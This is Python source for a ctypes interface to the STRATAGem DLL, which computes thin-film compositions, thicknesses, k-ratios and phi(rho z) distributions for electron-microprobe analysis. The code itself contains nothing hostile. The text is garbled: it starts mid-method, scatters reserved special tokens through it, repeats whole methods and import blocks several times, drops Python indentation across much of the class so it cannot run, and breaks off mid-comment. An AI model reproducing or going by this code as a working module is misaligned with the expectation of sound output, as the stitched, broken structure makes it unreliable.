                c.byref(density)):
                self._raise_error('Cannot get thickness')

            # Convert DLL units back (factors inverse of _add_layer's)
            return (composition, thickness.value / 10000000000.0,
                mass_thickness.value * 10.0, density.value * 1000.0)

        sample = Sample(get_layer(*self._substrate)[0])

        for layer, ilayer in self._layers.items():
            sample.add_layer(*get_layer(layer, ilayer))

        return sample
    @_check_key
    def compute_prz(self, maxdepth_m=None, bins=100):
        """
        Compute :math:`\\phi(\\rho z)` of all experiments.
        .. warning:: Only available for substrate (no layers).

        :arg maxdepth_m: maximum depth of the :math:`\\phi(\\rho z)`
            distribution in meters. If ``None``, Kanaya-Okayama electron range
            is used with a safety factor of 1.5.
        :type maxdepth_m: :class:`float`
        :arg bins: number of bins in the :math:`\\phi(\\rho z)` distribution
        :type bins: :class:`int`
        :return: a :class:`dict` where the keys are the experiments and the
            values are a tuple containing three lists:
            * :math:`\\rho z` coordinates (in g/cm2)
            * generated intensities of :math:`\\phi(\\rho z)` (no absorption)
            * emitted intensites of :math:`\\phi(\\rho z)`
        :raise RuntimeError: if layers were defined
        """
        if len(self._layers) > 0:
            raise RuntimeError('PRZ can only be computed for substrate')

        # Scale the DLL to the highest measured energy (keV)
        hvs_eV = map(attrgetter('energy_eV'), self._experiments.keys())
        maxhv_eV = max(hvs_eV)
        maxhv_ = c.c_double(maxhv_eV / 1000.0)
        logger.debug('StSetScaleHV(%s)', maxhv_eV / 1000.0)
        self._lib.StSetScaleHV(maxhv_)

        logger.debug('StComputePrz(key)')
        if not self._lib.StComputePrz(self._key):
            self._raise_error('Cannot compute prz')

        przs = {}
        for experiment, indexes in self._experiments.items():
            # Kanaya-Okayama electron range with a 1.5 safety factor.
            # NOTE(review): maxdepth_m is computed for the first experiment
            # only and then reused for all subsequent ones -- confirm this is
            # intended when experiments have different energies.
            if maxdepth_m is None:
                maxdepth_m = 0.0
                energy_keV = experiment.energy_eV / 1000.0
                for z, fraction in self._substrate[0].composition.items():
                    dr = 0.0276 * atomic_mass_kg_mol(z
                        ) * 1000.0 * energy_keV ** 1.67 / (z ** 0.89 *
                        mass_density_kg_m3(z) / 1000.0)
                    maxdepth_m += fraction / (dr * 1e-06)
                maxdepth_m = 1.0 / maxdepth_m
                maxdepth_m *= 1.5

            # Bin width expressed as mass depth
            increment_kg_m2 = maxdepth_m * self._substrate[0
                ].density_kg_m3 / bins

            ielt_ = c.c_int(indexes[0])
            iline_ = c.c_int(indexes[1])
            ihv_ = c.c_int(0)

            rzs = []
            ys_generated = []
            ys_emitted = []
            # NOTE(review): the appended rz values are in kg/m2 although the
            # docstring says g/cm2 (the DLL is fed the x0.1-converted value)
            # -- confirm the documented unit.
            for i in range(bins):
                rz_ = c.c_double(i * increment_kg_m2 * 0.1)
                rzs.append(i * increment_kg_m2)

                # Emitted intensity (absorption applied)
                y_ = c.c_double()
                bUseExp_ = c.c_bool(True)
                self._lib.StPhiRhoZ(self._key, ielt_, iline_, ihv_, rz_,
                    bUseExp_, c.byref(y_))
                ys_emitted.append(y_.value)

                # Generated intensity (no absorption)
                y_ = c.c_double()
                bUseExp_ = c.c_bool(False)
                self._lib.StPhiRhoZ(self._key, ielt_, iline_, ihv_, rz_,
                    bUseExp_, c.byref(y_))
                ys_generated.append(y_.value)

            przs.setdefault(experiment, (rzs, ys_generated, ys_emitted))

        return przs
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import os
import ctypes as c
import logging
logger = logging.getLogger(__name__)
from operator import attrgetter
import random
import string
import functools
try:
    import winreg
except ImportError:
    try:
        import _winreg as winreg
    except ImportError:
        # Non-Windows fallback: a stub exposing just enough of the winreg
        # API (OpenKey usable as a context manager, and QueryValueEx).
        class winreg:

            HKEY_CURRENT_USER = None

            class _PyHKEY(object):

                def __enter__(self):
                    return self

                def __exit__(self, exc_type, exc_value, traceback):
                    pass

            # BUGFIX: these were instance methods although they are called on
            # the class itself (winreg.OpenKey(...)); OpenKey also required
            # four arguments while callers pass two. classmethods with
            # defaults match the real winreg call signature.
            @classmethod
            def OpenKey(cls, key, sub_key, reserved=0, access=None):
                return cls._PyHKEY()

            @classmethod
            def QueryValueEx(cls, key, value_name):
                return None
from stratagemtools.sample import Sample, CONC_UNKNOWN, CONC_DIFF
from stratagemtools.experiment import Experiment, LINE_KA
from stratagemtools.element_properties import atomic_mass_kg_mol, mass_density_kg_m3
_REGISTRY_KEY = 'Software\\SAMx\\Stratagem\\Configuration'
_REGISTRY_VALUENAME = 'InstallOEMDirectory'
PRZMODE_XPP = 0
<|reserved_special_token_0|>
PRZMODE_PAP = 1
<|reserved_special_token_0|>
PRZMODE_GAU = 2
<|reserved_special_token_0|>
FLUORESCENCE_NONE = 0
<|reserved_special_token_0|>
FLUORESCENCE_LINE = 1
<|reserved_special_token_0|>
FLUORESCENCE_LINE_CONT = 2
<|reserved_special_token_0|>
_CONCENTRATION_FLAG_KNOWN = 0
_CONCENTRATION_FLAG_UNKNOWN = 1
_CONCENTRATION_FLAG_STOICHIOMETRIC = 2
_CONCENTRATION_FLAG_TRACE = 3
_CONCENTRATION_FLAG_DIFFERENCE = 4
class StratagemError(Exception):
    """
    Exception raised for all errors related to the STRATAGem interface.
    """
    pass
def _check_key(method):
@functools.wraps(method)
def wrapper(self, *args, **kwargs):
if self._key is None:
raise StratagemError('Not initialize. Call init().')
return method(self, *args, **kwargs)
return wrapper
class Stratagem:
"""
Main interface establishing a connection to the STRATAGem OEM interface and
perform calculations using SAMx's STRATAGem.
It is highly recommended to use :class:`Stratagem` as a context manager
(i.e. ``with`` statement) to ensure that the connection to the DLL is
properly closed.
For instance::
>>> with Stratagem() as strata:
... strata.prz_mode = PRZMODE_XPP
Otherwise the following series of method must be called::
>>> strata = Stratagem()
>>> strata.init()
>>> strata.prz_mode = PRZMODE_XPP
>>> strata.close()
"""
    def __init__(self, dll_path=None, display_error=True):
        """
        :arg dll_path: complete path to the location of ``stratadllogger.dll``
            (optional). If ``None``, the path is found in the Windows registry
            under ``Software\\SAMx\\Stratagem\\Configuration``. If the DLL is not
            found a :class:`StratagemError` is raised.
        :type dll_path: :class:`str`
        :arg display_error: whether to display a message dialog on error
        :type display_error: :class:`bool`
        """
        if dll_path is None:
            # Look up the installation directory in the Windows registry
            with winreg.OpenKey(winreg.HKEY_CURRENT_USER, _REGISTRY_KEY
                ) as key:
                basedir = winreg.QueryValueEx(key, _REGISTRY_VALUENAME)[0]
            dll_path = os.path.join(basedir, 'bin', 'stratadll.dll')

        cwd = os.getcwd()
        try:
            logger.debug('dll=%s', dll_path)
            self._lib = c.WinDLL(dll_path)
        finally:
            # NOTE(review): cwd is restored after loading the DLL, which
            # suggests loading can change the working directory -- confirm.
            os.chdir(cwd)

        logger.debug('StEnableErrorDisplay(%r)', display_error)
        self._lib.StEnableErrorDisplay(c.c_bool(display_error))

        self._key = None  # DLL object handle; None until init() is called
        self._cwd = os.getcwd()  # directory restored by reset()
        self._layers = {}  # Layer -> layer index in the DLL
        self._substrate = None  # (Layer, index) tuple
        self._experiments = {}  # Experiment -> (ielt, iline, iexpk) indexes
        self._tmpstandards = []  # paths of temporary standard files
    def __enter__(self):
        """Context-manager entry: initializes STRATAGem (see :meth:`init`)."""
        self.init()
        return self
    def __exit__(self, exc_type, exc_val, exc_tb):
        """Context-manager exit: closes the connection; exceptions propagate."""
        self.close()
        return False
    def _stobjectnew(self, key=None, standard=False):
        """
        Internal method creating a new STRATAGem object in the DLL.

        :arg key: identifier for the object; a random 8-letter ASCII key is
            generated when ``None``
        :arg standard: whether the object describes a standard
        :return: the key as a ctypes string buffer
        """
        if key is None:
            characters = string.ascii_lowercase
            key = ''.join(random.choice(characters) for _ in range(8))
            key = key.encode('ascii')
        # NOTE(review): `key` is bytes at this point, so the isinstance check
        # against c.c_byte never matches and the buffer is always created --
        # confirm whether a ctypes array/char_p type was intended here.
        if not isinstance(key, c.c_byte):
            key = c.create_string_buffer(key)

        bnormal_ = c.c_bool(not standard)
        iniflags_ = c.c_int(0)

        logger.debug('StObjectNew(key, %r, %i)', not standard, 0)
        if not self._lib.StObjectNew(key, bnormal_, iniflags_):
            self._raise_error('Cannot create object')

        return key
    def _raise_error(self, alternate=''):
        """
        Raises a :class:`StratagemError`.
        The error code and message of known errors are retrieved from STRATAGem.
        If this is not possible, *alternate* is used as the error message.

        :arg alternate: fallback message used when the DLL reports no error
        :raise StratagemError: always (or an :class:`OSError` via ``c.WinError``
            for Windows-typed errors)
        """
        errnum_ = c.c_ulong()
        errtype_ = c.c_int()
        self._lib.StGetLastError(c.byref(errnum_), c.byref(errtype_))
        if errnum_.value != 0:
            if errtype_.value == 0:
                # Error type 0: a human-readable message is available from the DLL
                buf_ = c.create_string_buffer(256)
                self._lib.StGetMsg(errnum_, buf_, 256)
                raise StratagemError(buf_.value.decode('ascii'))
            elif errtype_.value == 1:
                # NOTE(review): this passes errtype_ (always 1 in this branch)
                # as the Windows error code; errnum_ looks more likely intended
                # -- confirm against the STRATAGem OEM documentation.
                raise c.WinError(errtype_.value)
            else:
                raise StratagemError('Error %i' % errnum_.value)
        else:
            # DLL reported no error: fall back to the caller-provided message
            raise StratagemError(alternate)
    def init(self):
        """
        Initializes and setups STRATAGem.
        It does not have to be used if :class:`Stratagem` is used as a context
        manager.

        :raise RuntimeError: if called twice without :meth:`close` in between
        """
        if self._key is not None:
            raise RuntimeError('Already initialized. Call close() first.')
        self._key = self._stobjectnew()
        # Remember the current working directory; reset() later restores it
        # via os.chdir().
        self._cwd = os.getcwd()
        self.reset()
    def close(self):
        """
        Closes the connection to the STRATAGem DLL.
        It does not have to be used if :class:`Stratagem` is used as a context
        manager.
        """
        if self._key is not None:
            logger.debug('StObjectDelete(key)')
            self._lib.StObjectDelete(self._key)
            self._key = None
        # Delete the temporary standard files written by _create_standard();
        # reset() below clears the tracking list.
        for filepath in self._tmpstandards:
            os.remove(filepath)
            logger.debug('Remove temporary standard: %s', filepath)
        self.reset()
def reset(self):
"""
Resets all parameters to the defaults, remove all experiments and sample.
"""
if self._key:
self._lib.StObjectReset(self._key)
os.chdir(self._cwd)
self._layers.clear()
self._substrate = None
self._experiments.clear()
self._tmpstandards.clear()
@_check_key
def set_sample(self, sample):
"""
Sets the sample, which will be used in all subsequent calculations.
Note that only one sample can be defined.
:arg sample: sample definition
:type sample: :class:`Sample`
"""
self.reset()
for layer in sample.layers:
index = self._add_layer(layer, substrate=False)
self._layers.setdefault(layer, index)
index = self._add_layer(sample.substrate, substrate=True)
self._substrate = sample.substrate, index
@_check_key
def get_sample(self):
"""
Returns the current sample.
It can correspond to the sample defined by :meth:`set_sample` or the
sample resulting from the computations (see :meth:`compute`).
.. note:: a new sample is returned every time this method is called
:return: current sample
:rtype: :class:`Sample`
"""
sample = Sample(self._substrate[0].composition)
for layer in self._layers:
sample.add_layer(layer.composition, layer.thickness_m, layer.
mass_thickness_kg_m2, layer.density_kg_m3)
return sample
sample = property(get_sample, set_sample, doc='Property to set/get sample')
def _add_layer(self, layer, substrate=False, key=None):
"""
Internal method to add a layer from top to bottom.
The last layer added is considered as the substrate.
:arg layer: layer
:type layer: :class:`.Layer`
:return: index of the layer
"""
if key is None:
key = self._key
logger.debug('StSdAddLayer(key)')
ilayer_ = self._lib.StSdGetNbLayers(key)
logger.debug('StSdAddLayer(key, %i)', ilayer_)
if not self._lib.StSdAddLayer(key, ilayer_):
self._raise_error('Cannot add layer')
for i, value in enumerate(layer.composition.items()):
ielt_ = c.c_int(i)
logger.debug('StSdAddElt(key, %i, %i)', ilayer_, i)
if not self._lib.StSdAddElt(key, ilayer_, ielt_):
self._raise_error('Cannot add element')
z, wf = value
nra_ = c.c_int(z)
logger.debug('StSdSetNrAtom(key, %i, %i, %i)', ilayer_, i, z)
if not self._lib.StSdSetNrAtom(key, ilayer_, ielt_, nra_):
self._raise_error('Cannot set atomic number')
if wf is None or wf == CONC_UNKNOWN:
flag = _CONCENTRATION_FLAG_UNKNOWN
elif wf == CONC_DIFF:
flag = _CONCENTRATION_FLAG_DIFFERENCE
else:
flag = _CONCENTRATION_FLAG_KNOWN
wf_ = c.c_double(wf)
logger.debug('StSdSetConc(key, %i, %i, %f)', ilayer_, i, wf)
if not self._lib.StSdSetConc(key, ilayer_, ielt_, wf_):
self._raise_error('Cannot set concentration')
logger.debug('StSdSetConcFlag(key, %i, %i, %i)', ilayer_, i, flag)
if not self._lib.StSdSetConcFlag(key, ilayer_, ielt_, c.c_int(flag)
):
self._raise_error('Cannot set concentration flag')
if not substrate:
thick_known = layer.is_thickness_known()
thick_known_ = c.c_bool(thick_known)
if layer.is_density_known():
density = layer.density_kg_m3 / 1000.0
else:
density = 10.0
density_ = c.c_double(density)
if thick_known:
thickness = layer.thickness_m * 10000000000.0
mass_thickness = layer.mass_thickness_kg_m2 * 0.1
else:
thickness = 0.0
mass_thickness = 0.0
thickness_ = c.c_double(thickness)
mass_thickness_ = c.c_double(mass_thickness)
logger.debug('StSdSetThick(key, %i, %r, %d, %d, %d)', ilayer_,
thick_known, mass_thickness, thickness, density)
if not self._lib.StSdSetThick(key, ilayer_, thick_known_,
mass_thickness_, thickness_, density_):
self._raise_error('Cannot set thickness')
return int(ilayer_)
    def _create_standard(self, standard):
        """
        Internal method to create a new object defining the standard
        :class:`.Sample` and write it as a ``.tfs`` file in the standard
        directory.

        :arg standard: sample describing the standard
        :return: path to the saved standard file
        """
        # The standard is built in its own STRATAGem object (standard=True)
        key_ = self._stobjectnew(standard=True)
        for layer in standard.layers:
            self._add_layer(layer, substrate=False, key=key_)
        self._add_layer(standard.substrate, substrate=True, key=key_)

        # The file is named after the random object key
        filename = key_.value.decode('ascii') + '.tfs'
        filepath = os.path.join(self.get_standard_directory(), filename)
        filepath_ = c.create_string_buffer(filepath.encode('ascii'))
        logger.debug('StObjectWriteFile(key, %s)', filepath)
        if not self._lib.StObjectWriteFile(key_, filepath_):
            self._raise_error('Cannot save standard')
        self._lib.StObjectDelete(key_)

        # Tracked so close() can delete the temporary file
        self._tmpstandards.append(filepath)
        return filepath
    @_check_key
    def add_experiment(self, experiment):
        """
        Adds an experiment, i.e. measurements of k-ratio at different energies.
        .. hint:: Use :meth:`reset` method to remove defined experiments.

        :arg experiment: experiment
        :type experiment: :class:`Experiment`
        """
        nra_ = c.c_int(experiment.z)
        klm_ = c.c_int(experiment.line)
        hv_ = c.c_double(experiment.energy_eV / 1000.0)  # eV -> keV
        # Out-parameters: indexes assigned by the DLL for element/line/k-ratio
        ielt_ = c.c_int()
        iline_ = c.c_int()
        iexpk_ = c.c_int()
        logger.debug('StEdAddNrAtomLineHV(key, %i, %i)', experiment.z,
            experiment.line)
        if not self._lib.StEdAddNrAtomLineHV(self._key, nra_, klm_, hv_, c.
            byref(ielt_), c.byref(iline_), c.byref(iexpk_)):
            self._raise_error('Cannot add atomic number and line')

        # A Sample standard is first materialized as a temporary .tfs file
        standard = experiment.standard
        if isinstance(standard, Sample):
            standard = self._create_standard(standard)
        standard_ = c.create_string_buffer(standard.encode('ascii'))
        logger.debug('StEdSetLine(key, %i, %i, %i, %s)', ielt_.value,
            iline_.value, klm_.value, standard)
        if not self._lib.StEdSetLine(self._key, ielt_, iline_, klm_, standard_):
            self._raise_error('Cannot set standard')

        analyzed = experiment.is_analyzed()
        analyzed_ = c.c_bool(analyzed)
        logger.debug('StEdSetAnalyzedFlag(key, %i, %r)', ielt_.value, analyzed)
        if not self._lib.StEdSetAnalyzedFlag(self._key, ielt_, analyzed_):
            self._raise_error('Cannot add experiment analyzed flag')

        kratio_ = c.c_double(experiment.kratio)
        logger.debug('StEdSetExpK(key, %i, %i, %i, %f, %f, %f, 0.0, 2)',
            ielt_.value, iline_.value, iexpk_.value, experiment.energy_eV /
            1000.0, experiment.energy_eV / 1000.0, experiment.kratio)
        if not self._lib.StEdSetExpK(self._key, ielt_, iline_, iexpk_, hv_,
            hv_, kratio_, c.c_double(0.0), c.c_int(2)):
            self._raise_error('Cannot set experiment k-ratio')

        # Only analyzed experiments are kept for later result lookups
        if experiment.is_analyzed():
            indexes = ielt_.value, iline_.value, iexpk_.value
            self._experiments.setdefault(experiment, indexes)
@_check_key
def add_experiments(self, *exps):
"""
Adds several experiments::
>>> strata.add_experiments(exp1, exp2, exp3)
"""
for exp in exps:
self.add_experiment(exp)
def get_experiments(self):
"""
Returns a :class:`tuple` of all defined experiments.
:rtype: :class:`tuple`
"""
return tuple(self._experiments.keys())
@_check_key
def set_geometry(self, toa, tilt, azimuth):
"""
Sets the geometry.
:arg toa: take off angle (in radians)
:arg tilt: tilt angle (in radians)
:arg azimuth: azimuthal angle (in radians)
"""
toa_ = c.c_double(toa)
tilt_ = c.c_double(tilt)
azimuth_ = c.c_double(azimuth)
logger.debug('StSetGeomParams(key, %f, %f, %f)', toa, tilt, azimuth)
if not self._lib.StSetGeomParams(self._key, toa_, tilt_, azimuth_):
self._raise_error('Cannot set geometry parameters')
    @_check_key
    def get_geometry(self):
        """
        Returns the geometry.

        :return: take off angle (in radians), tilt angle (in radians),
            azimuthal angle (in radians)
        """
        # Out-parameters filled by the DLL
        toa_ = c.c_double()
        tilt_ = c.c_double()
        azimuth_ = c.c_double()
        logger.debug('StGetGeomParams(key)')
        if not self._lib.StGetGeomParams(self._key, c.byref(toa_), c.byref(
            tilt_), c.byref(azimuth_)):
            self._raise_error('Cannot get geometry parameters')
        return toa_.value, tilt_.value, azimuth_.value

    geometry = property(get_geometry, doc='Property to get geometry')
    @_check_key
    def set_prz_mode(self, mode):
        """
        Sets the type of model to use for the :math:`\\phi(\\rho z)`.

        :arg mode: type of model, either
            * :data:`PRZMODE_XPP`
            * :data:`PRZMODE_PAP`
            * :data:`PRZMODE_GAU`
        :type mode: :class:`int`
        """
        mode_ = c.c_int(mode)
        logger.debug('StSetPrzMode(%i)', mode)
        # NOTE(review): the return value is not checked, unlike most other
        # DLL calls in this class -- confirm the call cannot fail.
        self._lib.StSetPrzMode(mode_)
    @_check_key
    def get_prz_mode(self):
        """
        Returns the type of model to use for the :math:`\\phi(\\rho z)`.

        :return: either :data:`PRZMODE_XPP`, :data:`PRZMODE_PAP` or
            :data:`PRZMODE_GAU`
        :rtype: :class:`int`
        """
        return self._lib.StGetPrzMode()

    prz_mode = property(get_prz_mode, set_prz_mode, doc=
        'Property to get/set prz mode')
    @_check_key
    def set_fluorescence(self, flag):
        """
        Sets the fluorescence flag.

        :arg flag: either
            * :data:`FLUORESCENCE_NONE`
            * :data:`FLUORESCENCE_LINE`
            * :data:`FLUORESCENCE_LINE_CONT`
        :type flag: :class:`int`
        """
        flag_ = c.c_int(flag)
        logger.debug('StSetFluorFlg(%i)', flag)
        # NOTE(review): the return value is not checked -- confirm the call
        # cannot fail.
        self._lib.StSetFluorFlg(flag_)
@_check_key
def get_fluorescence(self):
"""
Returns the fluorescence flag.
:return: either :data:`FLUORESCENCE_NONE`, :data:`FLUORESCENCE_LINE`
or :data:`FLUORESCENCE_LINE_CONT`
:rtype: :class:`int`
"""
return self._lib.StGetFluorFlg()
fluorescence = property(get_fluorescence, set_fluorescence, doc=
'Property to get/set fluorescence')
@_check_key
def set_standard_directory(self, dirpath):
"""
Sets the directory where standard files are stored.
:arg dirpath: path to directory
:type dirpath: :class:`str`
"""
dirpath_ = c.create_string_buffer(dirpath.encode('ascii'))
self._lib.StSetDirectory(c.c_int(1), dirpath_)
@_check_key
def get_standard_directory(self):
"""
Returns the directory where standard files are stored.
:rtype: :class:`str`
"""
dirpath = (c.c_char * 256)()
self._lib.StGetDirectory(c.c_int(1), c.byref(dirpath), 256)
return dirpath.value.decode('ascii')
standard_directory = property(get_standard_directory,
set_standard_directory, doc='Property to get/set standard directory')
@_check_key
def compute_kratio_vs_thickness(self, layer, thickness_low_m,
thickness_high_m, step):
"""
Computes the variation of the k-ratio as a function of the thickness
for a layer.
:arg layer: layer of a sample (must have been previously added)
:type layer: :class:`.Layer`
:arg thickness_low_m: lower limit of the thickness in meters
:type thickness_low_m: :class:`float`
:arg thickness_high_m: upper limit of the thickness in meters
:type thickness_high_m: :class:`float`
:arg step: number of steps
:type step: :class:`int`
:return: :class:`tuple` containing
* :class:`list` of thicknesses
* :class:`dict` where the keys are experiments (as defined by
:meth:`.add_experiment`) and the values are :class:`list`
containing k-ratios for each thickness
"""
logger.debug('StSetKvsThicknessUnit(2)')
self._lib.StSetKvsThicknessUnit(2)
if layer not in self._layers:
raise ValueError('Unknown layer')
ilayer = self._layers[layer]
ilayer_ = c.c_int(ilayer)
step_ = c.c_int(step)
logger.debug('StSetNbComputedHV(%i)', step)
self._lib.StSetNbComputedHV(step_)
low_ = c.c_double(thickness_low_m * 1000000000.0)
high_ = c.c_double(thickness_high_m * 1000000000.0)
logger.debug('StComputeKvsThickness(key, %i, %f, %f)', ilayer,
thickness_low_m * 1000000000.0, thickness_high_m * 1000000000.0)
if not self._lib.StComputeKvsThickness(self._key, ilayer_, low_, high_
):
self._raise_error('Cannot compute k-ratio vs thickness')
thicknesses = []
kratios = {}
thick_ = c.c_double()
k_ = c.c_double()
for i in range(step + 1):
i_ = c.c_int(i)
if not self._lib.StGetKvsT_Thick(self._key, i_, c.byref(thick_)):
self._raise_error('Cannot get thickness')
thicknesses.append(thick_.value)
for experiment, indexes in self._experiments.items():
ielt_ = c.c_int(indexes[0])
iline_ = c.c_int(indexes[1])
iHv_ = c.c_int(indexes[2])
if not self._lib.StGetKvsT_K(self._key, i_, ielt_, iline_,
iHv_, c.byref(k_)):
self._raise_error('Cannot get k-ratio')
kratios.setdefault(experiment, []).append(k_.value)
return thicknesses, kratios
@_check_key
def compute_kratio_vs_energy(self, energy_high_eV, step):
"""
Computes the variation of the k-ratio as a function of the incident
energy.
Note that the computation also starts at 0 keV up to the specified energy.
:arg energy_high_eV: upper limit of the thickness in electronvolts
:type energy_high_eV: :class:`float`
:arg step: number of steps
:type step: :class:`int`
:return: :class:`tuple` containing
* :class:`list` of energies in electronvolts
* :class:`dict` where the keys are experiments (as defined by
:meth:`.add_experiment`) and the values are :class:`list`
containing k-ratios for each energy
"""
step_ = c.c_int(step)
logger.debug('StSetNbComputedHV(%i)', step)
self._lib.StSetNbComputedHV(step_)
energy_ = c.c_double(energy_high_eV / 1000.0)
logger.debug('StSetMaxHV(%f)' % (energy_high_eV / 1000.0,))
self._lib.StSetMaxHV(energy_)
logger.debug('StComputeKvsHV(key)')
if not self._lib.StComputeKvsHV(self._key):
self._raise_error('Cannot compute k-ratio vs energy')
energies = []
kratios = {}
k_ = c.c_double()
bHV_ = c.c_bool(True)
increment = float(energy_high_eV / 1000.0) / step
for i in range(step + 1):
hv = i * increment
hv_ = c.c_double(hv)
for experiment, indexes in self._experiments.items():
ielt_ = c.c_int(indexes[0])
iline_ = c.c_int(indexes[1])
if not self._lib.StKvsHvOrRx(self._key, ielt_, iline_, hv_,
bHV_, c.byref(k_)):
self._raise_error('Cannot get k-ratio')
kratios.setdefault(experiment, []).append(k_.value)
energies.append(hv)
return energies, kratios
@_check_key
def compute_kratios(self):
"""
Computes the k-ratios of the different experiments.
:return: :class:`dict` where the keys are experiments (as defined by
:meth:`.add_experiment`) and the values are k-ratios
(:class:`float`).
"""
if len(self._layers) == 0:
return self._compute_kratios_substrate()
else:
return self._compute_kratios_multilayers()
@_check_key
def _compute_kratios_multilayers(self):
"""
Internal method to compute the k-ratios using the
:meth:`compute_kratio_vs_thickness`.
"""
for i, layer in enumerate(self._layers.keys()):
if not layer.is_thickness_known():
raise ValueError('Thickness of layer %i is unknown' % i)
layer = list(self._layers.keys())[0]
thickness_low_m = layer.thickness_m
thickness_high_m = layer.thickness_m * 10
step = 1
_thicknesses, kratios = self.compute_kratio_vs_thickness(layer,
thickness_low_m, thickness_high_m, step)
output = {}
for experiment, kratio in kratios.items():
output.setdefault(experiment, kratio[0])
return output
@_check_key
def _compute_kratios_substrate(self):
"""
Internal method to compute the k-ratios using the
:meth:`compute_kratio_vs_energy`.
"""
output = {}
step = 2
for experiment in self._experiments:
energy_high_eV = experiment.energy_eV
_energies, kratios = self.compute_kratio_vs_energy(energy_high_eV,
step)
kratio = kratios[experiment][-1]
if kratio < 0:
logger.warn(
'STRATAGem returns a negative k-ratio, re-try with energy + 1 eV'
)
_energies, kratios = self.compute_kratio_vs_energy(
energy_high_eV + 1.0, step)
kratio = kratios[experiment][-1]
output.setdefault(experiment, kratio)
return output
@_check_key
def compute(self, iteration_max=50):
"""
Computes the unknown composition(s) and thickness(es) in the specified
sample.
:arg iteration_max: maximum number of iterations of the solve
(default: 50)
:type iteration_max: :class:`int`
:return: calculated sample
:rtype: :class:`.Sample`
"""
zs = set(exp.z for exp in self._experiments.keys())
for layer in (list(self._layers.keys()) + [self._substrate[0]]):
for z, wf in layer.composition.items():
if z in zs:
continue
if wf is None:
continue
logger.debug('Added dummy experiment for z=%i', z)
exp = Experiment(z, LINE_KA, 0.0, analyzed=False)
self.add_experiment(exp)
iteration_max_ = c.c_int(iteration_max)
logger.debug('StSetMaxNbIter(%i)', iteration_max)
self._lib.StSetMaxNbIter(iteration_max_)
logger.debug('StComputeIterpStart(key)')
if not self._lib.StComputeIterpStart(self._key):
self._raise_error('Cannot start iteration')
continue_ = c.c_bool(True)
iteration = 0
logger.debug('Start iteration')
while True:
iteration += 1
logger.debug('Iteration #%i' % iteration)
logger.debug('StComputeIterpNext(key, %r)' % continue_.value)
if not self._lib.StComputeIterpNext(self._key, c.byref(continue_)):
break
if not continue_.value:
break
logger.debug('Iteration completed')
thick_known = c.c_bool()
mass_thickness = c.c_double()
thickness = c.c_double()
density = c.c_double()
def get_layer(layer, ilayer):
ilayer_ = c.c_int(ilayer)
logger.debug('StSdGetNbElts(key, %i)' % ilayer)
nbelt = self._lib.StSdGetNbElts(self._key, ilayer_)
if nbelt == -1:
self._raise_error('Cannot get number of elements')
flag_ = (c.c_int * nbelt)()
wfs_ = (c.c_double * nbelt)()
logger.debug('StSdGetLayRawConcs(key, %i, flag, wfs)' % ilayer)
if not self._lib.StSdGetLayRawConcs(self._key, ilayer_, flag_, wfs_
):
self._raise_error('Cannot get layer concentration')
composition = {}
for z in layer.composition.keys():
nra_ = c.c_int(z)
logger.debug('StSdGetEltIdx(key, %i, %i)' % (ilayer, z))
zindex = self._lib.StSdGetEltIdx(self._key, ilayer_, nra_)
composition[z] = wfs_[zindex]
logger.debug('StSdGetThick(key, %i)', ilayer)
if not self._lib.StSdGetThick(self._key, ilayer_, c.byref(
thick_known), c.byref(mass_thickness), c.byref(thickness),
c.byref(density)):
self._raise_error('Cannot get thickness')
return (composition, thickness.value / 10000000000.0,
mass_thickness.value * 10.0, density.value * 1000.0)
sample = Sample(get_layer(*self._substrate)[0])
for layer, ilayer in self._layers.items():
sample.add_layer(*get_layer(layer, ilayer))
return sample
@_check_key
def compute_prz(self, maxdepth_m=None, bins=100):
"""
Compute :math:`\\phi(\\rho z)` of all experiments.
.. warning:: Only available for substrate (no layers).
:arg maxdepth_m: maximum depth of the :math:`\\phi(\\rho z)`
distribution in meters. If ``None``, Kanaya-Okayama electron range
is used with a safety factor of 1.5.
:type maxdepth_m: :class:`float`
:arg bins: number of bins in the :math:`\\phi(\\rho z)` distribution
:type bins: :class:`int`
:return: a :class:`dict` where the keys are the experiments and the
values are a tuple containing three lists:
* :math:`\\rho z` coordinates (in g/cm2)
* generated intensities of :math:`\\phi(\\rho z)` (no absorption)
* emitted intensites of :math:`\\phi(\\rho z)`
"""
if len(self._layers) > 0:
raise RuntimeError('PRZ can only be computed for substrate')
hvs_eV = map(attrgetter('energy_eV'), self._experiments.keys())
maxhv_eV = max(hvs_eV)
maxhv_ = c.c_double(maxhv_eV / 1000.0)
logger.debug('StSetScaleHV(%s)', maxhv_eV / 1000.0)
self._lib.StSetScaleHV(maxhv_)
logger.debug('StComputePrz(key)')
if not self._lib.StComputePrz(self._key):
self._raise_error('Cannot compute prz')
przs = {}
for experiment, indexes in self._experiments.items():
if maxdepth_m is None:
maxdepth_m = 0.0
energy_keV = experiment.energy_eV / 1000.0
for z, fraction in self._substrate[0].composition.items():
dr = 0.0276 * atomic_mass_kg_mol(z
) * 1000.0 * energy_keV ** 1.67 / (z ** 0.89 *
mass_density_kg_m3(z) / 1000.0)
maxdepth_m += fraction / (dr * 1e-06)
maxdepth_m = 1.0 / maxdepth_m
maxdepth_m *= 1.5
increment_kg_m2 = maxdepth_m * self._substrate[0
].density_kg_m3 / bins
ielt_ = c.c_int(indexes[0])
iline_ = c.c_int(indexes[1])
ihv_ = c.c_int(0)
rzs = []
ys_generated = []
ys_emitted = []
for i in range(bins):
rz_ = c.c_double(i * increment_kg_m2 * 0.1)
rzs.append(i * increment_kg_m2)
y_ = c.c_double()
bUseExp_ = c.c_bool(True)
self._lib.StPhiRhoZ(self._key, ielt_, iline_, ihv_, rz_,
bUseExp_, c.byref(y_))
ys_emitted.append(y_.value)
y_ = c.c_double()
bUseExp_ = c.c_bool(False)
self._lib.StPhiRhoZ(self._key, ielt_, iline_, ihv_, rz_,
bUseExp_, c.byref(y_))
ys_generated.append(y_.value)
przs.setdefault(experiment, (rzs, ys_generated, ys_emitted))
return przs
"""
Main class of the interface.
It sets up the experimental parameters such as the :class:`.Experiment`'s and
:class:`.Sample`, geometry (:attr:`geometry <Stratagem.geometry>`), type of
:math:`\\phi(\\rho z)` model (:attr:`prz_mode <Stratagem.prz_mode>`) and
fluorescence mode (:attr:`fluorescence <Stratagem.fluorescence>`).
"""
# Standard library modules.
import os
import ctypes as c
import logging
logger = logging.getLogger(__name__)
from operator import attrgetter
import random
import string
import functools
try:
    import winreg
except ImportError:
    try:
        import _winreg as winreg
    except ImportError:
        # Non-Windows fallback: minimal stub mirroring the small part of the
        # winreg API used below so the module stays importable. OpenKey()
